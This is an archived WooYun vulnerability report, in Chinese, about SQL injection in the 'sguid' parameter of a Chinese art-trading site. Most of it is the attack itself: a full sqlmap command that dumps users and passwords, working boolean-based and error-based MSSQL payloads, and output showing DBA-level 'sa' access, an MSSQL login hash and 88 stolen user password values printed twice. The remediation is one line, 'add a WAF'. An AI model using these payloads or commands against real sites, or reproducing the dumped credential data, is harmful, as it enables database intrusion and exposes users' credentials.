乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-08: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经确认,细节仅向厂商公开 2015-12-21: 细节向核心白帽子及相关领域专家公开 2015-12-31: 细节向普通白帽子公开 2016-01-10: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
原创艺术网是专注于做名家大家、草根原创艺术的中国艺术网站,提供全面的艺术新闻、艺术批评、前沿观点交锋、画廊服务、展讯展览、艺术品投资、艺术品交易、艺术品拍卖等及时全面信息的艺术品交易平台,为艺术家提供展示、交易、投融资等服务。
地址:http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72
$ python sqlmap.py -u "http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72" -p sguid --technique=BE --output-dir=output --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
current user: 'sa'current user is DBA: Truedatabase management system users [1]:[*] ##MS_PolicyEventProcessingLogin##database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x0100dcd1cd01f3622132e0dfc0539d9e47c56d2d7c6abc9d90be header: 0x0100 salt: dcd1cd01 mixedcase: f3622132e0dfc0539d9e47c56d2d7c6abc9d90be
Database: CloudCopyRightTable: T_BaseUser[88 entries]+----------------------------------+| sPassword |+----------------------------------+| /AvImcKTRa3XgPSADcBvwg== || /BYLNFHKCk8= || /GPRUZlheyvQ+JCfQUCTXw== || /oqRFR+M0utkHXHBpLqOPg== || +/Y9OUOmkx7SlNCVdF64mA== || +8HYaqV/U59Gj9obccICuw== || +gQvOoV9BInCi602P65COg== || +Pph1I+Y9IKXXWbrsxMhNg== || +w0AzPVe/Ux7759du08Dmg== || 0llvK4s4NwBh40KI5f7o9A== || 15LRYA0WPerCknGtisql8g== || 1dmpz/PpEJ5PW3dRCPUWXA== || 1TeUOb6XRg0F/bXhoFRNaQ== || 1uhJCEqMvXWRafqw+xrR6Q== || 24BRTnNAVb8= || 27dZ3cOjfzQR47vrZX2cZw== || 2rvgM7gzo9A= || 39vDjCULPtMsP0AY11QxPg== || 3bRZEWJE6wfAe/cb+TF5qg== || 3JHHNSdHAvOddchWxmh7rA== || 3zS8ukY0DCQ= || 4AZ46j/Y25c= || 4GxJ5BJ7ddP1sJSEytDIZQ== || 4u4WZSeQH9lCsFR4wrZVLA== || 4wZ9+PMZD7Kl2KG02RtuVw== || 4ZHlpWhBeb2LYBFQq8w77A== || 4ZVxn5V/t40= || 58TQYRn/L9G0QLVChCk7+w== || 5Tcl6DC/4DGUucB2V7BTqQ== || 6FfJOgFGnzE= || 6sZszs2pwXmBlZ7+oRKFKA== || 71Q1faolnEobQ8M86VMyRg== || 7ee/+hpJhpYBOB4BTiafsA== || 7GV+vIGe6nQfn1vUs3tdOg== || 7O8QEeU9oO7MuNrAP+NNbCCeUsl8ppec || 7TLkdKBRHL0= || 80jle4blfNZAPUEjcSpBIw== || 8cRjirfp8JsikH2mK+odtQ== || 8fgPDJ4x5JE= || 8Hg6q0QZdRRn7pVaJrTcJg== || 8tmIy2og0C1qq1wPq2H92g== || 8xY3ZVopegbQlqwW4HjStQ== || 9ftT59s+C6F+VaursFlEOw== || 9lpQYRKYq/0IFr6UQ3cF6A== || 9w/j/OaVVQE= || a+GSISp/A/n34JHqFkoddA== || A2aS9WYO57JjllfxtC+nvw== || A4bFDi9UqrY= || a5od3rVOYfSXeJWiIwLSvg== || A6HBeBI+Uwo= || aF44EcXw3YFVAb5jDY3uoA== || aMMk/4cBJbjVXDOv+Zv3AA== || az0UW279zOvywuyVl3r7Cg== || B2QRX9VmQIc= || B5Nq+z9eCrt2RKXsptZ3zQ== || bAWOiOFrZGiFnAHn/mCAQg== || BbtkreUA7uLImJ2g0dn4Kw== || bdRGEe64wjEqB77ultdImw== || C9pPDNMkzIDNpVVeysI76A== || cagITV//hHf2Wm5ns/DnmA== || cbhVBU8xipSZzt+UP2VY3YEgC4IEGJSV || CIPA9Us67ij1CfNTrwFIjQ== || cLB+6M46HP3XPPyQ4hUuPg== || d9rSxFOnLiumgzd/PDRl5Q== || dgU4SuvalHQiJCHdmgDQmg== || dMlXD+qmu6k/BEqdhkPBZw== || DWc8THNQG70opAFk8eYWww== || DzOTYynkv7QmMoLO6EYlRA== || DzYIXEVc2N0= || E4sW/XfdUYJOEp+cx5QmHg== || Ed9/eFbJHQmW8+dPWZeYGw== || EfaUvBmeaKg= || eOUWa96Jzt1BnJ+WPBfpsg== || EpVmVyVenNxFuOpH55N2hg== || EV3t4YD0MuHzkK1cdit1tIa7PRAEPg4F || exAWvmZz3QY= || F1pl8VqO4EDaK0uSzSxaPf4L8r+d6bMH || f3Qj6Q0Z8YQFpLF+XXzItA== || fFvoQLYQPS4Y9R0Lgan4NA== || FTsSxVcOd5tL3KLygBzC0A== || FxYhP5pMvGBOxxRvaZS0GQ== || GblCc+ZNGWCo6x6aPdOJBQ== || gsre/ZZytoxi20ZnHa5/YQ== || h2z7KacoZPQGzSYtOC/DqQ== || Ht+WVicBY1I= || HTV2dJKE11S267KhQgKIOA== || i3+wfuj5tAI= || iAhsmcXsmhR1o0QcERwwQQ== |+----------------------------------+
---Parameter: sguid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sguid=e6c0033100b848dd85888e5c16f40e72' AND 2530=2530 AND 'oxqk'='oxqk Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sguid=e6c0033100b848dd85888e5c16f40e72' AND 9371=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9371=9371) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'vafZ'='vafZ---web server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NET, Nginxback-end DBMS: Microsoft SQL Server 2008current user: 'sa'current user is DBA: Truedatabase management system users [1]:[*] ##MS_PolicyEventProcessingLogin##database management system users password hashes:[*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x0100dcd1cd01f3622132e0dfc0539d9e47c56d2d7c6abc9d90be header: 0x0100 salt: dcd1cd01 mixedcase: f3622132e0dfc0539d9e47c56d2d7c6abc9d90becolumns LIKE 'pass' were found in the following databases:Database: CloudCopyRightTable: T_BaseUser[1 column]+-----------+----------+| Column | Type |+-----------+----------+| sPassword | nvarchar |+-----------+----------+Database: CloudCopyRightTable: T_BaseUser[88 entries]+----------------------------------+| sPassword |+----------------------------------+| /AvImcKTRa3XgPSADcBvwg== || /BYLNFHKCk8= || /GPRUZlheyvQ+JCfQUCTXw== || /oqRFR+M0utkHXHBpLqOPg== || +/Y9OUOmkx7SlNCVdF64mA== || +8HYaqV/U59Gj9obccICuw== || +gQvOoV9BInCi602P65COg== || +Pph1I+Y9IKXXWbrsxMhNg== || +w0AzPVe/Ux7759du08Dmg== || 0llvK4s4NwBh40KI5f7o9A== || 15LRYA0WPerCknGtisql8g== || 1dmpz/PpEJ5PW3dRCPUWXA== || 1TeUOb6XRg0F/bXhoFRNaQ== || 1uhJCEqMvXWRafqw+xrR6Q== || 24BRTnNAVb8= || 27dZ3cOjfzQR47vrZX2cZw== || 2rvgM7gzo9A= || 39vDjCULPtMsP0AY11QxPg== || 3bRZEWJE6wfAe/cb+TF5qg== || 3JHHNSdHAvOddchWxmh7rA== || 3zS8ukY0DCQ= || 4AZ46j/Y25c= || 4GxJ5BJ7ddP1sJSEytDIZQ== || 4u4WZSeQH9lCsFR4wrZVLA== || 4wZ9+PMZD7Kl2KG02RtuVw== || 4ZHlpWhBeb2LYBFQq8w77A== || 4ZVxn5V/t40= || 58TQYRn/L9G0QLVChCk7+w== || 5Tcl6DC/4DGUucB2V7BTqQ== || 6FfJOgFGnzE= || 6sZszs2pwXmBlZ7+oRKFKA== || 71Q1faolnEobQ8M86VMyRg== || 7ee/+hpJhpYBOB4BTiafsA== || 7GV+vIGe6nQfn1vUs3tdOg== || 7O8QEeU9oO7MuNrAP+NNbCCeUsl8ppec || 7TLkdKBRHL0= || 80jle4blfNZAPUEjcSpBIw== || 8cRjirfp8JsikH2mK+odtQ== || 8fgPDJ4x5JE= || 8Hg6q0QZdRRn7pVaJrTcJg== || 8tmIy2og0C1qq1wPq2H92g== || 8xY3ZVopegbQlqwW4HjStQ== || 9ftT59s+C6F+VaursFlEOw== || 9lpQYRKYq/0IFr6UQ3cF6A== || 9w/j/OaVVQE= || a+GSISp/A/n34JHqFkoddA== || A2aS9WYO57JjllfxtC+nvw== || A4bFDi9UqrY= || a5od3rVOYfSXeJWiIwLSvg== || A6HBeBI+Uwo= || aF44EcXw3YFVAb5jDY3uoA== || aMMk/4cBJbjVXDOv+Zv3AA== || az0UW279zOvywuyVl3r7Cg== || B2QRX9VmQIc= || B5Nq+z9eCrt2RKXsptZ3zQ== || bAWOiOFrZGiFnAHn/mCAQg== || BbtkreUA7uLImJ2g0dn4Kw== || bdRGEe64wjEqB77ultdImw== || C9pPDNMkzIDNpVVeysI76A== || cagITV//hHf2Wm5ns/DnmA== || cbhVBU8xipSZzt+UP2VY3YEgC4IEGJSV || CIPA9Us67ij1CfNTrwFIjQ== || cLB+6M46HP3XPPyQ4hUuPg== || d9rSxFOnLiumgzd/PDRl5Q== || dgU4SuvalHQiJCHdmgDQmg== || dMlXD+qmu6k/BEqdhkPBZw== || DWc8THNQG70opAFk8eYWww== || DzOTYynkv7QmMoLO6EYlRA== || DzYIXEVc2N0= || E4sW/XfdUYJOEp+cx5QmHg== || Ed9/eFbJHQmW8+dPWZeYGw== || EfaUvBmeaKg= || eOUWa96Jzt1BnJ+WPBfpsg== || EpVmVyVenNxFuOpH55N2hg== || EV3t4YD0MuHzkK1cdit1tIa7PRAEPg4F || exAWvmZz3QY= || F1pl8VqO4EDaK0uSzSxaPf4L8r+d6bMH || f3Qj6Q0Z8YQFpLF+XXzItA== || fFvoQLYQPS4Y9R0Lgan4NA== || FTsSxVcOd5tL3KLygBzC0A== || FxYhP5pMvGBOxxRvaZS0GQ== || GblCc+ZNGWCo6x6aPdOJBQ== || gsre/ZZytoxi20ZnHa5/YQ== || h2z7KacoZPQGzSYtOC/DqQ== || Ht+WVicBY1I= || HTV2dJKE11S267KhQgKIOA== || i3+wfuj5tAI= || iAhsmcXsmhR1o0QcERwwQQ== |+----------------------------------+
上WAF。
危害等级:中
漏洞Rank:10
确认时间:2015-12-11 19:03
CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无